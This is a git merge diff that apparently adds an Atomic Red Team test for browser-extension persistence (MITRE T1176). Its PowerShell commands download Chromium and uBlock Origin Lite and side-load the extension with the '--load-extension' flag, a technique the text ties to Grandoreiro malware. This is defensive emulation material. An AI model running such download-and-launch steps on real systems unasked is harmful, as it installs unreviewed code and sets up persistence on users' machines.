Merge branch 'master' into master

atomics/Indexes/Indexes-CSV/index.csv

@@ -866,6 +866,7 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4ab
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
+persistence,T1176,Browser Extensions,5,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell

atomics/Indexes/Indexes-CSV/windows-index.csv

@@ -605,6 +605,7 @@ persistence,T1176,Browser Extensions,1,Chrome (Developer Mode),3ecd790d-2617-4ab
 persistence,T1176,Browser Extensions,2,Chrome (Chrome Web Store),4c83940d-8ca5-4bb2-8100-f46dc914bc3f,manual
 persistence,T1176,Browser Extensions,3,Firefox,cb790029-17e6-4c43-b96f-002ce5f10938,manual
 persistence,T1176,Browser Extensions,4,Edge Chromium Addon - VPN,3d456e2b-a7db-4af8-b5b3-720e7c4d9da5,manual
+persistence,T1176,Browser Extensions,5,Google Chrome Load Unpacked Extension With Command Line,7a714703-9f6b-461c-b06d-e6aeac650f27,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,1,Application Shim Installation,9ab27e22-ee62-4211-962b-d36d9a0e6a18,command_prompt
 persistence,T1546.011,Event Triggered Execution: Application Shimming,2,New shim database files created in the default shim database directory,aefd6866-d753-431f-a7a4-215ca7e3f13d,powershell
 persistence,T1546.011,Event Triggered Execution: Application Shimming,3,Registry key creation and/or modification events for SDB,9b6a06f9-ab5e-4e8d-8289-1df4289db02f,powershell

atomics/Indexes/Indexes-Markdown/index.md

@@ -1330,6 +1330,7 @@
   - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
   - Atomic Test #3: Firefox [linux, windows, macos]
   - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
+  - Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
 - T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)

atomics/Indexes/Indexes-Markdown/windows-index.md

@@ -946,6 +946,7 @@
   - Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
   - Atomic Test #3: Firefox [linux, windows, macos]
   - Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
+  - Atomic Test #5: Google Chrome Load Unpacked Extension With Command Line [windows]
 - T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)

atomics/Indexes/index.yaml

@@ -57495,6 +57495,48 @@ persistence:
 
           2. Click 'Get'
         name: manual
+    - name: Google Chrome Load Unpacked Extension With Command Line
+      auto_generated_guid: 7a714703-9f6b-461c-b06d-e6aeac650f27
+      description: |-
+        This test loads an unpacked extension in Google Chrome with the `--load-extension` parameter. This technique was previously used by the Grandoreiro malware to load a malicious extension that would capture the browsing history, steal cookies and other user information. Other malwares also leverage this technique to hijack searches, steal passwords, inject ads, and more.
+
+        References:
+        https://attack.mitre.org/techniques/T1176/
+        https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/
+      supported_platforms:
+      - windows
+      input_arguments:
+        working_dir:
+          description: Working directory where the files will be downloaded and extracted
+          type: string
+          default: "$env:TEMP"
+      executor:
+        command: |2-
+
+          # Chromium
+          $chromium =  "https://commondatastorage.googleapis.com/chromium-browser-snapshots/Win_x64/1153778/chrome-win.zip"
+
+          # uBlock Origin Lite to test side-loading
+          $extension = "https://github.com/gorhill/uBlock/releases/download/uBOLite_0.1.23.6055/uBOLite_0.1.23.6055.chromium.mv3.zip"
+
+          Set-Location "#{working_dir}"
+
+          Set-Variable ProgressPreference SilentlyContinue
+          Invoke-WebRequest -URI $chromium -OutFile "#{working_dir}\chrome.zip"
+          Invoke-WebRequest -URI $extension -OutFile "#{working_dir}\extension.zip"
+
+
+          Expand-Archive chrome.zip -DestinationPath "#{working_dir}" -Force
+          Expand-Archive extension.zip -Force
+
+          Start-Process .\chrome-win\chrome.exe --load-extension="#{working_dir}\extension\" -PassThru
+        cleanup_command: |-
+          Set-Location "#{working_dir}"
+          Stop-Process -Name chrome -Force
+          Remove-Item .\chrome.zip, .\chrome-win, .\extension, .\extension.zip -Recurse -Force
+          Set-Variable ProgressPreference Continue
+        name: powershell
+        elevation_required: true
   T1058:
     technique:
       x_mitre_platforms:

atomics/Indexes/windows-index.yaml

@@ -50258,6 +50258,48 @@ persistence:
 
           2. Click 'Get'
         name: manual
+    - name: Google Chrome Load Unpacked Extension With Command Line
+      auto_generated_guid: 7a714703-9f6b-461c-b06d-e6aeac650f27
+      description: |-
+        This test loads an unpacked extension in Google Chrome with the `--load-extension` parameter. This technique was previously used by the Grandoreiro malware to load a malicious extension that would capture the browsing history, steal cookies and other user information. Other malwares also leverage this technique to hijack searches, steal passwords, inject ads, and more.
+
+        References:
+        https://attack.mitre.org/techniques/T1176/
+        https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/
+      supported_platforms:
+      - windows
+      input_arguments:
+        working_dir:
+          description: Working directory where the files will be downloaded and extracted
+          type: string
+          default: "$env:TEMP"
+      executor:
+        command: |2-
+
+          # Chromium
+          $chromium =  "https://commondatastorage.googleapis.com/chromium-browser-snapshots/Win_x64/1153778/chrome-win.zip"
+
+          # uBlock Origin Lite to test side-loading
+          $extension = "https://github.com/gorhill/uBlock/releases/download/uBOLite_0.1.23.6055/uBOLite_0.1.23.6055.chromium.mv3.zip"
+
+          Set-Location "#{working_dir}"
+
+          Set-Variable ProgressPreference SilentlyContinue
+          Invoke-WebRequest -URI $chromium -OutFile "#{working_dir}\chrome.zip"
+          Invoke-WebRequest -URI $extension -OutFile "#{working_dir}\extension.zip"
+
+
+          Expand-Archive chrome.zip -DestinationPath "#{working_dir}" -Force
+          Expand-Archive extension.zip -Force
+
+          Start-Process .\chrome-win\chrome.exe --load-extension="#{working_dir}\extension\" -PassThru
+        cleanup_command: |-
+          Set-Location "#{working_dir}"
+          Stop-Process -Name chrome -Force
+          Remove-Item .\chrome.zip, .\chrome-win, .\extension, .\extension.zip -Recurse -Force
+          Set-Variable ProgressPreference Continue
+        name: powershell
+        elevation_required: true
   T1058:
     technique:
       x_mitre_platforms:

atomics/T1176/T1176.md

@@ -20,6 +20,8 @@ There have also been instances of botnets using a persistent backdoor through ma
 
 - [Atomic Test #4 - Edge Chromium Addon - VPN](#atomic-test-4---edge-chromium-addon---vpn)
 
+- [Atomic Test #5 - Google Chrome Load Unpacked Extension With Command Line](#atomic-test-5---google-chrome-load-unpacked-extension-with-command-line)
+
 
 <br/>
 
@@ -133,4 +135,64 @@ in Edge Chromium
 
 
 
+<br/>
+<br/>
+
+## Atomic Test #5 - Google Chrome Load Unpacked Extension With Command Line
+This test loads an unpacked extension in Google Chrome with the `--load-extension` parameter. This technique was previously used by the Grandoreiro malware to load a malicious extension that would capture the browsing history, steal cookies and other user information. Other malwares also leverage this technique to hijack searches, steal passwords, inject ads, and more.
+
+References:
+https://attack.mitre.org/techniques/T1176/
+https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/
+
+**Supported Platforms:** Windows
+
+
+**auto_generated_guid:** 7a714703-9f6b-461c-b06d-e6aeac650f27
+
+
+
+
+
+#### Inputs:
+| Name | Description | Type | Default Value |
+|------|-------------|------|---------------|
+| working_dir | Working directory where the files will be downloaded and extracted | string | $env:TEMP|
+
+
+#### Attack Commands: Run with `powershell`!  Elevation Required (e.g. root or admin) 
+
+
+```powershell
+# Chromium
+$chromium =  "https://commondatastorage.googleapis.com/chromium-browser-snapshots/Win_x64/1153778/chrome-win.zip"
+
+# uBlock Origin Lite to test side-loading
+$extension = "https://github.com/gorhill/uBlock/releases/download/uBOLite_0.1.23.6055/uBOLite_0.1.23.6055.chromium.mv3.zip"
+
+Set-Location "#{working_dir}"
+
+Set-Variable ProgressPreference SilentlyContinue
+Invoke-WebRequest -URI $chromium -OutFile "#{working_dir}\chrome.zip"
+Invoke-WebRequest -URI $extension -OutFile "#{working_dir}\extension.zip"
+
+
+Expand-Archive chrome.zip -DestinationPath "#{working_dir}" -Force
+Expand-Archive extension.zip -Force
+
+Start-Process .\chrome-win\chrome.exe --load-extension="#{working_dir}\extension\" -PassThru
+```
+
+#### Cleanup Commands:
+```powershell
+Set-Location "#{working_dir}"
+Stop-Process -Name chrome -Force
+Remove-Item .\chrome.zip, .\chrome-win, .\extension, .\extension.zip -Recurse -Force
+Set-Variable ProgressPreference Continue
+```
+
+
+
+
+
 <br/>

atomics/T1176/T1176.yaml

@@ -67,3 +67,49 @@ atomic_tests:
       2. Click 'Get'
     name: manual
 
+- name: Google Chrome Load Unpacked Extension With Command Line
+  auto_generated_guid: 7a714703-9f6b-461c-b06d-e6aeac650f27
+
+  description: |-
+    This test loads an unpacked extension in Google Chrome with the `--load-extension` parameter. This technique was previously used by the Grandoreiro malware to load a malicious extension that would capture the browsing history, steal cookies and other user information. Other malwares also leverage this technique to hijack searches, steal passwords, inject ads, and more.
+    
+    References:
+    https://attack.mitre.org/techniques/T1176/
+    https://securityintelligence.com/posts/grandoreiro-malware-now-targeting-banks-in-spain/
+
+  supported_platforms:
+  - windows
+  input_arguments:
+    working_dir:
+      description: Working directory where the files will be downloaded and extracted
+      type: string
+      default: $env:TEMP
+  executor:
+    command: |-
+
+      # Chromium
+      $chromium =  "https://commondatastorage.googleapis.com/chromium-browser-snapshots/Win_x64/1153778/chrome-win.zip"
+
+      # uBlock Origin Lite to test side-loading
+      $extension = "https://github.com/gorhill/uBlock/releases/download/uBOLite_0.1.23.6055/uBOLite_0.1.23.6055.chromium.mv3.zip"
+
+      Set-Location "#{working_dir}"
+
+      Set-Variable ProgressPreference SilentlyContinue
+      Invoke-WebRequest -URI $chromium -OutFile "#{working_dir}\chrome.zip"
+      Invoke-WebRequest -URI $extension -OutFile "#{working_dir}\extension.zip"
+
+
+      Expand-Archive chrome.zip -DestinationPath "#{working_dir}" -Force
+      Expand-Archive extension.zip -Force
+
+      Start-Process .\chrome-win\chrome.exe --load-extension="#{working_dir}\extension\" -PassThru
+
+    cleanup_command: |-
+      Set-Location "#{working_dir}"
+      Stop-Process -Name chrome -Force
+      Remove-Item .\chrome.zip, .\chrome-win, .\extension, .\extension.zip -Recurse -Force
+      Set-Variable ProgressPreference Continue
+
+    name: powershell
+    elevation_required: true

atomics/used_guids.txt

@@ -1351,3 +1351,4 @@ c3b65cd5-ee51-4e98-b6a3-6cbdec138efc
 7784c64e-ed0b-4b65-bf63-c86db229fd56
 899a7fb5-d197-4951-8614-f19ac4a73ad4
 c9a2f6fe-7197-488c-af6d-10c782121ca6
+7a714703-9f6b-461c-b06d-e6aeac650f27